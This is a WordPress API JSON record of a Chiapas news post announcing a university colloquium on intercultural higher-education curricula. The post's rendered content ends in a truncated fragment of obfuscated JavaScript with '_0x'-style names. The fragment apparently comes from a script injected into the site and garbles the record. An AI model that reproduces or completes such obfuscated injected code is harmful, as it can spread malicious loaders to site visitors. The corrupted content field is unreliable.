{"id":6563,"date":"2022-11-11T04:48:24","date_gmt":"2022-11-11T04:48:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6563"},"modified":"2022-11-11T04:48:25","modified_gmt":"2022-11-11T04:48:25","slug":"anuncian-coloquio-la-interculturalizacion-del-curriculo-en-la-educacion-superior","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6563","title":{"rendered":"Anuncian coloquio La interculturalizaci\u00f3n del curr\u00edculo en la educaci\u00f3n superior"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"968\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-10-at-5.22.47-PM-968x1024.jpeg\" alt=\"\" class=\"wp-image-6564\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-10-at-5.22.47-PM-968x1024.jpeg 968w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-10-at-5.22.47-PM-284x300.jpeg 284w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-10-at-5.22.47-PM-768x812.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/WhatsApp-Image-2022-11-10-at-5.22.47-PM.jpeg 1210w\" sizes=\"auto, (max-width: 968px) 100vw, 968px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Joaqu\u00edn Pe\u00f1a Pi\u00f1a, Profesor de la Universidad Intercultural de Chiapas (UNICH), dio a conocer que 14 al 16 de noviembre de 2022, se llevar\u00e1 a cabo el Coloquio \u201cLa interculturalizaci\u00f3n del curr\u00edculo en la educaci\u00f3n superior: experiencias y retos desde la comunalidad y la vinculaci\u00f3n comunitaria\u201d, donde participan catedr\u00e1ticos de la Universidad Aut\u00f3noma Comunal de Oaxaca \u201cSanta Mar\u00eda Colotepec\u201d y del Centro Universitario del Norte \u2013 Universidad de Guadalajara (Cunorte,UDG).<\/p>\n\n\n\n<p>El docente dio a conocer que este coloquio tiene como objetivo analizar desde diferentes experiencias institucionales, la importancia de la interculturalizaci\u00f3n y la comunalizaci\u00f3n del curr\u00edculo en la educaci\u00f3n superior y desde la vinculaci\u00f3n comunitaria, que permitan la redefinici\u00f3n y\/o actualizaci\u00f3n de proyectos formativos para diferentes contextos sociales, pol\u00edticos, econ\u00f3micos y culturales.<\/p>\n\n\n\n<p>Esperan tener resultados que tracen \u201cl\u00edneas de acci\u00f3n que permitan la redefinici\u00f3n y\/o actualizaci\u00f3n de los proyectos de formaci\u00f3n en la educaci\u00f3n superior, de acuerdo a los diferentes contextos sociales, pol\u00edticos, econ\u00f3micos y culturales\u201d.<\/p>\n\n\n\n<p>Adelant\u00f3 que la mesa 1 tiene como tema la Interculturalizaci\u00f3n del curr\u00edculo y saberes en la educaci\u00f3n superior; en la mesa 2: Di\u00e1logo de saberes, vinculaci\u00f3n comunitaria e interculturalidad; la Mesa 3 \u201cComunalidad y aprendizajes para la vida\u201d; y un Conversatorio \u201cLa interculturalizaci\u00f3n del curr\u00edculo: Retos y Rumbos en la educaci\u00f3n superior\u201d.<\/p>\n\n\n\n<p>Pe\u00f1a Pi\u00f1a, destac\u00f3 que para este evento se abordar\u00e1n temas de inter\u00e9s general, y se contar\u00e1 como invitado especial al rector de la Universidad Aut\u00f3noma Comunal de Oaxaca \u201cSanta Mar\u00eda Colotepec\u201d y del Centro Universitario del Norte \u2013 Universidad de Guadalajara (Cunorte,UDG), Uriel Nu\u00f1o Guti\u00e9rrez, Rector CUNORTE, por lo que invit\u00f3 al p\u00fablico interesado, consultar el programa general en www.unich.edu.mx, siendo en evento totalmente gratis.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- Joaqu\u00edn Pe\u00f1a Pi\u00f1a, Profesor de la Universidad Intercultural de Chiapas (UNICH), dio a conocer que 14 al 16 de noviembre de 2022, se llevar\u00e1 a cabo el Coloquio \u201cLa interculturalizaci\u00f3n del curr\u00edculo en la educaci\u00f3n superior: experiencias y retos desde la comunalidad y la vinculaci\u00f3n comunitaria\u201d, donde participan &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6564,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-6563","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6563","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6563"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6563\/revisions"}],"predecessor-version":[{"id":6565,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6563\/revisions\/6565"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6564"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6563"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6563"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6563"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}